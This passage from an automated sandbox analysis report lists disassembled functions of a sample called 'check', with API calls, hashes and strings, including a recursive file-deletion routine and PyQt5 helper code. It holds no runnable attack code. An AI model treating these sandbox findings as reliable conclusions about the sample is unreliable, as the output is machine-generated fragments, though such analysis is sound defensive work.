                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B902E3B2A2865282E7748B18D4946BD3EA1EB85FC8F544131EACE477D5DF2CF844C720
                                                                                                                                                                                                                                          Function 00007FF7124F83C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F842B
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84AE
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84CD
                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84DB
                                                                                                                                                                                                                                          • FindClose.KERNEL32(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84EC
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84F5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                          • String ID: %s\*
                                                                                                                                                                                                                                          • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                          • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                          • Instruction ID: 2fa65c9a665bdd242f8f1fa2d4fee73d271b5ebdbec547f78dad87419e254311
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5413D21A0CD5295FB20AF28E4941BAB360FBD4764FC00232ED9D46698EFACD95DC720
                                                                                                                                                                                                                                          Function 00007FF89ECA1300 Relevance: 10.9, APIs: 7, Instructions: 375COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747637090.00007FF89ECA0000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECA6000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECEA000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECF8000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ED47000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748309003.00007FF89ED4A000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748347304.00007FF89ED4C000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mem_$MallocSubtypeType_$DeallocErr_FreeMemory
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4139299733-0
                                                                                                                                                                                                                                          • Opcode ID: f3b34b9a491a7328e3479242aa4f01da2548d41b57f80c50a6892646becf0bf0
                                                                                                                                                                                                                                          • Instruction ID: d89a9df4716c59487fe973b417ef7574eeacdd0e641206acb8cc82f3ec6105e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3b34b9a491a7328e3479242aa4f01da2548d41b57f80c50a6892646becf0bf0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5F1D0B2A2C5A281EB74CF19A0946BD3FA5EB55FC8F541135DA8E866D1DE2CF841C320
                                                                                                                                                                                                                                          Function 00007FF7124FD12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                                                                                                          • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                          • Instruction ID: 6186b7209e92ae963fc60d930f2b6915e0db903a7c216c6a85be89b92cda1950
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A310E76608F8186EB649F64E8803ED6364FB88754F444039DA5E47B94EFB8D55CC710
                                                                                                                                                                                                                                          Function 00007FF712515C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515C45
                                                                                                                                                                                                                                            • Part of subcall function 00007FF712515598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7125155AC
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A948: HeapFree.KERNEL32(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A95E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A948: GetLastError.KERNEL32(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A968
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF71250A8DF,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250A909
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF71250A8DF,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250A92E
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515C34
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7125155F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71251560C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515EAA
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515EBB
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515ECC
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF71251610C), ref: 00007FF712515EF3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4070488512-0
                                                                                                                                                                                                                                          • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                          • Instruction ID: 93481a503800abafbd4be4194f86b3e5cce9f863cada2d1c5842c354bea1f4af
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46D1D326F08A4246E720BF25E8C11B9A351FF847B8FC98175EA0D47695DFBCE849C760
                                                                                                                                                                                                                                          Function 00007FF89D944060 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_$Data@@List$?dispose@ClearData@1@@$Iter_Next$?detach_grow@Data@1@FlagsFormatIterObject_OccurredType_
                                                                                                                                                                                                                                          • String ID: index %zd has type '%s' but 'QSize' is expected
                                                                                                                                                                                                                                          • API String ID: 898475402-3766856804
                                                                                                                                                                                                                                          • Opcode ID: 22aff701cd8974979b8ffcb373a0892395954389d425d6826c011b03a68b9281
                                                                                                                                                                                                                                          • Instruction ID: 8500e459d8c7f92f47c0b574e993035faa0f0bc5057230cfa0336e686528dd7c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22aff701cd8974979b8ffcb373a0892395954389d425d6826c011b03a68b9281
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3B16437A19A4286EA709F16E85927D73A0FB94FD9F448031DA8F03756EF3CE4658304
                                                                                                                                                                                                                                          Function 00007FF89D991D10 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 159COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_$Point@@@@Vector@$Clear$??1?$Iter_Next$??0?$?append@?$FlagsFormatIterObject_OccurredPoint@@@Type_
                                                                                                                                                                                                                                          • String ID: index %zd has type '%s' but 'QPoint' is expected
                                                                                                                                                                                                                                          • API String ID: 3758343881-1323054559
                                                                                                                                                                                                                                          • Opcode ID: 98516a7ebec38b1a0359b68afb74948ec938ec2c2a424e400557337a404b8a58
                                                                                                                                                                                                                                          • Instruction ID: ac8d8713a941f3aa26ecb6061403ef4fc3d9afcf189210ed95b58e36dd204c35
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98516a7ebec38b1a0359b68afb74948ec938ec2c2a424e400557337a404b8a58
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9515F23A0964686FA75AF52A80927963E0BF54FE5F484431ED8F13764EF3CF4658308
                                                                                                                                                                                                                                          Function 00007FF89D9A2040 Relevance: 30.0, APIs: 10, Strings: 7, Instructions: 271COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?drawPolygon@QPainter@@QEAAXAEBVQPolygonF@@W4FillRule@Qt@@@Z.QT5GUI ref: 00007FF89D9A20EA
                                                                                                                                                                                                                                          • ?drawPolygon@QPainter@@QEAAXAEBVQPolygon@@W4FillRule@Qt@@@Z.QT5GUI ref: 00007FF89D9A2189
                                                                                                                                                                                                                                          • ?drawPolygon@QPainter@@QEAAXPEBVQPointF@@HW4FillRule@Qt@@@Z.QT5GUI ref: 00007FF89D9A2237
                                                                                                                                                                                                                                          • PyTuple_Size.PYTHON3 ref: 00007FF89D9A22EF
                                                                                                                                                                                                                                          • ?drawPolygon@QPainter@@QEAAXPEBVQPointF@@HW4FillRule@Qt@@@Z.QT5GUI ref: 00007FF89D9A2303
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON3 ref: 00007FF89D9A2322
                                                                                                                                                                                                                                          • ?drawPolygon@QPainter@@QEAAXPEBVQPoint@@HW4FillRule@Qt@@@Z.QT5GUI ref: 00007FF89D9A23ED
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89D9C2F60: PyTuple_Size.PYTHON3(?,?,?,?,?,00007FF89D99C1F7), ref: 00007FF89D9C2F82
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89D9C2F60: ??0QPoint@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF89D99C1F7), ref: 00007FF89D9C2FB5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89D9C2F60: PyTuple_Size.PYTHON3(?,?,?,?,?,00007FF89D99C1F7), ref: 00007FF89D9C2FD4
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89D9C2F60: PyTuple_GetItem.PYTHON3(?,?,?,?,?,00007FF89D99C1F7), ref: 00007FF89D9C2FF5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89D9C2F60: PyTuple_Size.PYTHON3(?,?,?,?,?,00007FF89D99C1F7), ref: 00007FF89D9C3050
                                                                                                                                                                                                                                          • PyTuple_Size.PYTHON3 ref: 00007FF89D9A2483
                                                                                                                                                                                                                                          • ?drawPolygon@QPainter@@QEAAXPEBVQPoint@@HW4FillRule@Qt@@@Z.QT5GUI ref: 00007FF89D9A2497
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON3 ref: 00007FF89D9A24B6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?drawFillPainter@@Polygon@Qt@@@Rule@Tuple_$Size$Point@@$DeallocPoint$ItemPolygonPolygon@@
                                                                                                                                                                                                                                          • String ID: B>|E$BJ0W$BJ8W$BJ9|E$QPainter$drawPolygon$drawPolygon(self, points: QPolygonF, fillRule: Qt.FillRule = Qt.OddEvenFill)drawPolygon(self, points: QPolygon, fillRule: Qt.FillRule = Qt.OddEvenFill)drawPolygon(self, points: Optional[PyQt5.sip.array[Union[QPointF, QPoint]]], fillRule: Qt.FillRule = Qt.Odd
                                                                                                                                                                                                                                          • API String ID: 2830521402-1740170162
                                                                                                                                                                                                                                          • Opcode ID: 8d65a05f47ce59ac9780dd44e4799bcded3ce6bbd403743e2e89cd1553ba8f99
                                                                                                                                                                                                                                          • Instruction ID: a90abf83e4f9c083cff21092d9feb749da68ceb0cae015347c7151d35f380828
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d65a05f47ce59ac9780dd44e4799bcded3ce6bbd403743e2e89cd1553ba8f99
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78E1C93760AF42C9D760CF25E8841A973E8FB59BD8B511136EA8E43B28EF38E554D704
                                                                                                                                                                                                                                          Function 00007FF89D947D00 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • index %zd has type '%s' but 'QAbstractTextDocumentLayout::Selection' is expected, xrefs: 00007FF89D947EEA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_$Clear$Iter_Next$?sharedArrayData@@FlagsFormatIterNull@Object_OccurredType_
                                                                                                                                                                                                                                          • String ID: index %zd has type '%s' but 'QAbstractTextDocumentLayout::Selection' is expected
                                                                                                                                                                                                                                          • API String ID: 2049041316-1958747605
                                                                                                                                                                                                                                          • Opcode ID: 9213cfae156598d7415754f89e7399fcde264da16264df3f21234ef025318e78
                                                                                                                                                                                                                                          • Instruction ID: 09dafeef59215f8b72bb598bb3c2f2ab7b937188d0ffb980bd8eebebec29bca6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9213cfae156598d7415754f89e7399fcde264da16264df3f21234ef025318e78
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4616E27A1961682EA70AF26E80923963E1BF54FE4F444531ED9F137A1EF3CF4568348
